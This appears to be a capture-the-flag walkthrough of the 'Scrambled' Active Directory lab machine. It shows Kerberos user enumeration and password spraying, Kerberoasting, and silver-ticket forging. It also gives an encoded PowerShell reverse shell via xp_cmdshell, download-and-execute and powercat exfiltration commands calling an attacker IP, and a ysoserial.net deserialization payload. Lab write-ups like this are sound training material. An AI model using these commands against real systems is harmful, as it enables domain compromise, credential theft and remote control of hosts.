
Scrambled#

Enum#

Web documentation

phone internal dial - 08
support@scramblecorp.com
ipconfig > %USERPROFILE%\Desktop\ip.txt
4411 - Sale order client custom app
NTLM has been disabled

Domain names

scramblecorp.com
scrm.local
dc1.scrm.local
hostmaster.scrm.local

Kerberos bruteforcing#

Using Kerbrute for user enumeration

kerbrute userenum \
    -d scrm.local \
    --dc scrambled.htb \
    /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

Using Kerbrute for password spraying

kerbrute passwordspray \
    -d scrm.local \
    --dc scrambled.htb \
    ./users.txt \
    ksimpson

Obtaining a TGT#

Granting ourselves a Kerberos TGT based on discovered password

getTGT.py \
    scrm.local/ksimpson:ksimpson \
    -dc-ip scrambled.htb

Enumerating smb shares with the TGT

smbclient.py \
    scrm.local/ksimpson:ksimpson@dc1.scrm.local \
    -dc-ip scrambled.htb \
    -debug \
    -k

Kerberoasting#

Obtaining a TGS with GetUserSPNs.py

An SPN is the identifier of a service instance.
SPNs are used by Kerberos to associate a service instance with a service logon account.
This allows a client to request that the service authenticate an account
even if the client does not have the account name.
So basically what GetUserSPNs.py does is:
authenticated as ksimpson, it enumerates the accounts that have SPNs set
and requests TGSes for them, so we get back a TGS
from which we learn the SPN MSSQLSvc/dc1.scrm.local.

export KRB5CCNAME=ksimpson.ccache
GetUserSPNs.py \
    -request scrm.local/ksimpson \
    -no-pass \
    -k \
    -dc-host dc1.scrm.local \
    -outputfile kerbrute-key.txt

Using john to crack the TGS

john kerbrute-key.txt --wordlist=/usr/share/wordlists/rockyou.txt
Pegasus60

Silver Ticket Attack#

- Golden ticket - Access to the whole domain by stealing the krbtgt NT hash, allowing us to forge a TGT
- Silver ticket - Access to a single service by stealing the service account's NT hash, allowing us to forge a TGS

See the BlackHat talk "Abusing Microsoft Kerberos: Sorry You Guys Don't Get It".
We have all the ingredients to perform a silver ticket attack:

NT hash    - can be derived from sqlsvc's password
Domain SID - the security identifier of the domain
Domain     - scrm.local
SPN        - we got that from GetUserSPNs.py
User ID    - 500

Get the Domain SID from the PAC (Privilege Attribute Certificate)

The PAC is an extension to Kerberos tickets that contains useful information about a user’s privileges
This information is added to Kerberos tickets by a DC when a user authenticates to the domain.
The PAC can be read when users use their Kerberos tickets to authenticate to other systems.
This can be leveraged to determine their level of privileges without reaching out to the DC.

getPac.py \
    -targetUser ksimpson \
    scrm.local/ksimpson:ksimpson

Domain SID: S-1-5-21-2743207045-1827831105-2542523200

The info that’s relevant to us here is the Domain SID,
so we could get that from any user in the domain,
as long as we can authenticate with kerberos and get their PAC

getPac.py \
    -targetUser sqlsvc \
    scrm.local/sqlsvc:Pegasus60

Domain SID: S-1-5-21-2743207045-1827831105-2542523200

Make an NT hash from the password we already got from cracking the TGS.
The NT hash is plain MD4 over the UTF-16LE encoding of the password, no salt.

https://codebeautify.org/ntlm-hash-generator
or do it like an adult (on OpenSSL 3, md4 lives in the legacy provider, so add -provider legacy to the dgst call if it complains)

printf "Pegasus60"|xxd
printf "Pegasus60"|iconv -f ASCII -t UTF-16LE|xxd
printf "Pegasus60"|iconv -f ASCII -t UTF-16LE|openssl dgst -md4
printf "Pegasus60"|iconv -f ASCII -t UTF-16LE|openssl dgst -md4|awk '{print $NF}'
b999a16500b87d17ec7f2e2a68778f05

Generating a “Silver ticket” to access the MsSQL instance

ticketer.py \
    -nthash b999a16500b87d17ec7f2e2a68778f05 \
    -domain-sid S-1-5-21-2743207045-1827831105-2542523200 \
    -domain scrm.local \
    -spn MSSQLSvc/dc1.scrm.local \
    -user-id 500 \
    Administrator

MsSQL Foothold#

Use the “Silver Ticket” TGS to connect to MsSQL with impacket

export KRB5CCNAME=Administrator.ccache
mssqlclient.py -k dc1.scrm.local

Loot the Database

SQL> select name from sys.databases
SQL> select table_name from information_schema.tables
SQL> use ScrambleHR
SQL> select * from UserImport
MiscSvc - ScrambledEggs9900 - scrm.local

Use enable_xp_cmdshell to run a shell through MsSQL (the encoded PowerShell payload below was generated with https://www.revshells.com/)

SQL> enable_xp_cmdshell
SQL> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANAAzACIALAA0ADIANAAyACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

Lateral privesc#

Run Nishang’s Invoke-PowerShellTcp.ps1 as scrm\miscsvc

$password = ConvertTo-SecureString "ScrambledEggs9900" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("scrm\miscsvc", $password)

Invoke-Command -Computer dc1 -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.10.14.43:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.43 -Port 4545 } -Credential $creds

Binary reversing and exploitation#

Exfiltrate ScrambleClient.exe and ScrambleLib.dll with powercat

IEX(New-Object Net.Webclient).downloadString('http://10.10.14.43:8000/powercat.ps1')
powercat -c 10.10.14.43 -p 4646 -i C:\Users\miscsvc\Downloads\ScrambleLib.dll
nc -lp 4646 -q 1  > ScrambleLib.dll < /dev/null
powercat -c 10.10.14.43 -p 4646 -i C:\Users\miscsvc\Downloads\ScrambleClient.exe
nc -lp 4646 -q 1  > ScrambleClient.exe < /dev/null

We then need to reverse the binary and DLL with dnSpy to figure out that it uses BinaryFormatter,
which performs insecure deserialisation and will let us execute one more reverse shell.

Use the .NET adaptation of ysoserial (ysoserial.net) to craft the payload

./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "powershell IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.43:8000/Invoke-TcpReverseShell.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.43 -Port 4747"